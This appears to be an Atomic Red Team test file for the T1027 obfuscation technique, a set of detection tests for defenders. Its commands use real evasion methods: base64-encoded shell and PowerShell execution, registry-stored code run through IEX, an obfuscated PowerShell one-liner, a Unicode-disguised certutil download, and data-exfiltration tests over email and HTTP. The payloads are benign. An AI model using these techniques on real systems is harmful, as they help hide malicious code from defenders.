atomic-red-team/atomics/T1027/T1027.yaml

attack_technique: T1027
display_name: Obfuscated Files or Information
atomic_tests:
- name: Decode base64 Data into Script
  auto_generated_guid: f45df6be-2e1e-4136-a384-8f18ab3826fb
  description: |
    Creates a base64-encoded data file and decodes it into an executable shell script

    Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that echoes `Hello from the Atomic Red Team` 
    and uname -v
  supported_platforms:
  - macos
  - linux
  input_arguments:
    shell_command:
      description: command to encode
      type: string
      default: "echo Hello from the Atomic Red Team && uname -v"
  dependency_executor_name: sh
  dependencies:
  - description: |
      encode the command into base64 file
    prereq_command: |
      if [ -e "/tmp/encoded.dat" ]; then exit 0; else exit 1; fi
    get_prereq_command: |
      if [ "$(uname)" = 'FreeBSD' ]; then cmd="b64encode -r -"; else cmd="base64"; fi;
      echo "#{shell_command}" | $cmd > /tmp/encoded.dat
  executor:
    command: |
      if [ "$(uname)" = 'FreeBSD' ]; then cmd="b64decode -r"; else cmd="base64 -d"; fi;
      cat /tmp/encoded.dat | $cmd > /tmp/art.sh
      chmod +x /tmp/art.sh
      /tmp/art.sh
    cleanup_command: |
      rm /tmp/encoded.dat 
      rm /tmp/art.sh
    name: sh
- name: Execute base64-encoded PowerShell
  auto_generated_guid: a50d5a97-2531-499e-a1de-5544c74432c6
  description: |
    Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools.

    Upon successful execution, powershell will execute an encoded command and stdout default is "Write-Host "Hey, Atomic!"
  supported_platforms:
  - windows
  input_arguments:
    powershell_command:
      description: PowerShell command to encode
      type: string
      default: Write-Host "Hey, Atomic!"
  executor:
    command: |
      $OriginalCommand = '#{powershell_command}'
      $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
      $EncodedCommand =[Convert]::ToBase64String($Bytes)
      $EncodedCommand
      powershell.exe -EncodedCommand $EncodedCommand
    name: powershell
- name: Execute base64-encoded PowerShell from Windows Registry
  auto_generated_guid: 450e7218-7915-4be4-8b9b-464a49eafcec
  description: |
    Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by numerous adversaries and malicious tools.

    Upon successful execution, powershell will execute encoded command and read/write from the registry.
  supported_platforms:
  - windows
  input_arguments:
    registry_key_storage:
      description: Windows Registry Key to store code
      type: string
      default: HKCU:Software\Microsoft\Windows\CurrentVersion
    powershell_command:
      description: PowerShell command to encode
      type: string
      default: Write-Host "Hey, Atomic!"
    registry_entry_storage:
      description: Windows Registry entry to store code under key
      type: string
      default: Debug
  executor:
    command: |
      $OriginalCommand = '#{powershell_command}'
      $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
      $EncodedCommand =[Convert]::ToBase64String($Bytes)
      $EncodedCommand

      Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
      powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))"
    cleanup_command: |
      Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage}
    name: powershell
- name: Execution from Compressed File
  auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f
  description: |
    Mimic execution of compressed executable. When successfully executed, calculator.exe will open.
  supported_platforms:
  - windows
  input_arguments:
    url_path:
      description: url to download Exe
      type: url
      default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip
  dependency_executor_name: powershell
  dependencies:
  - description: |
      T1027.exe must exist on disk at PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe
    prereq_command: |
      if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe") {exit 0} else {exit 1}
    get_prereq_command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
      Invoke-WebRequest "#{url_path}" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1027.zip"
      Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\T1027.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\" -Force
  executor:
    command: |
      "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe"
    cleanup_command: |
      taskkill /f /im calculator.exe >nul 2>nul
      taskkill /f /im CalculatorApp.exe >nul 2>nul
    name: command_prompt
- name: DLP Evasion via Sensitive Data in VBA Macro over email
  auto_generated_guid: 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad
  description: |
    Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using email.
    Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
  supported_platforms:
  - windows
  input_arguments:
    input_file:
      description: Path of the XLSM file
      type: path
      default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
    sender:
      description: sender email
      type: string
      default: test@corp.com
    receiver:
      description: receiver email
      type: string
      default: test@corp.com
    smtp_server:
      description: SMTP Server IP Address
      type: string
      default: 127.0.0.1
  executor:
    command: |
      Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments "#{input_file}" -SmtpServer #{smtp_server}
    name: powershell
- name: DLP Evasion via Sensitive Data in VBA Macro over HTTP
  auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319
  description: |
    Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using HTTP.
    Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
  supported_platforms:
  - windows
  input_arguments:
    input_file:
      description: Path of the XLSM file
      type: path
      default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
    ip_address:
      description: Destination IP address
      type: string
      default: 127.0.0.1
  executor:
    command: |
      Invoke-WebRequest -Uri #{ip_address} -Method POST -Body "#{input_file}"
    name: powershell
- name: Obfuscated Command in PowerShell
  auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f
  description: |
    This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
  supported_platforms:
  - windows
  executor:
    command: |
      $cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING')  ;   $pz2Sb0  =[TYpE]("{1}{0}{2}"-f'nv','cO','ert')  ;  &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') (  (&("{1}{2}{0}"-f'blE','gET-','vaRIA')  ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] (  $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )
    name: powershell
- name: Obfuscated Command Line using special Unicode characters
  auto_generated_guid: e68b945c-52d0-4dd9-a5e8-d173d70c448f
  description: |
    This is an obfuscated certutil command that when executed downloads a file from the web. Adapted from T1105. Obfuscation includes special options chars (unicode hyphens), character substitution (e.g. ᶠ) and character insertion (including the usage of the right-to-left 0x202E and left-to-right 0x202D override characters).
    Reference:
    https://wietze.github.io/blog/windows-command-line-obfuscation
  supported_platforms:
  - windows
  input_arguments:
    remote_file:
      description: URL of file to download
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
    local_path:
      description: Local path/filename to save the downloaded file to
      type: path
      default: Atomic-license.txt
  executor:
    steps: |
      1. Copy the following command into the command prompt after replacing #{remote_file} and #{local_path} with your desired URL and filename.


        certutil —ૹu૰rlࢰca࣢c෯he  –‮spli؅t‮‭ −"൏ᶠ൸" #{remote_file} #{local_path}


      2. Press enter to execute the command. You will find the file or webpage you specified saved to the file you specified in the command.

    name: manual
- name: Snake Malware Encrypted crmlog file
  auto_generated_guid: 7e47ee60-9dd1-4269-9c4f-97953b183268
  description: |
    The following Atomic Test will create a file with a specific name and sets its attributes to Hidden, System, and Archive. This was related to the Snake Malware campaign and is later decrypted by Snake's kernel driver.
    [Snake Malware - CISA](https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF)  
  supported_platforms:
  - windows
  executor:
    command: |
      $file = New-Item $env:windir\registration\04e53197-72be-4dd8-88b1-533fe6eed577.04e53197-72be-4dd8-88b1-533fe6eed577.crmlog; $file.Attributes = 'Hidden', 'System', 'Archive'; Write-Host "File created: $($file.FullName)"
    cleanup_command: |
      $fileNameToDelete = '04e53197-72be-4dd8-88b1-533fe6eed577.04e53197-72be-4dd8-88b1-533fe6eed577.crmlog'; $filePathToDelete = "$env:windir\registration\"; $fullPathToDelete = Join-Path $filePathToDelete $fileNameToDelete; if (Test-Path $fullPathToDelete) { Remove-Item -Path $fullPathToDelete -Force; Write-Host "File deleted: $fullPathToDelete" } else { Write-Host "File not found: $fullPathToDelete" }
    name: powershell
    elevation_required: true
- name: Execution from Compressed JScript File
  auto_generated_guid: fad04df1-5229-4185-b016-fb6010cd87ac
  description: |
    Mimic execution of compressed JavaScript file. When successfully executed, calculator.exe will open. This test is meant to help emulate Gootloader as per https://redcanary.com/blog/gootloader/
  supported_platforms:
  - windows
  input_arguments:
    url_path:
      description: url to download JScript file
      type: url
      default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/t1027js.zip
  dependency_executor_name: powershell
  dependencies:
  - description: |
      T1027.js must exist on disk at PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js
    prereq_command: |
      if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      Invoke-WebRequest "#{url_path}" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1027js.zip"
      Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\T1027js.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\" -Force
  executor:
    command: |
      "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js"
    cleanup_command: |
      taskkill /f /im calculator.exe >nul 2>nul
    name: command_prompt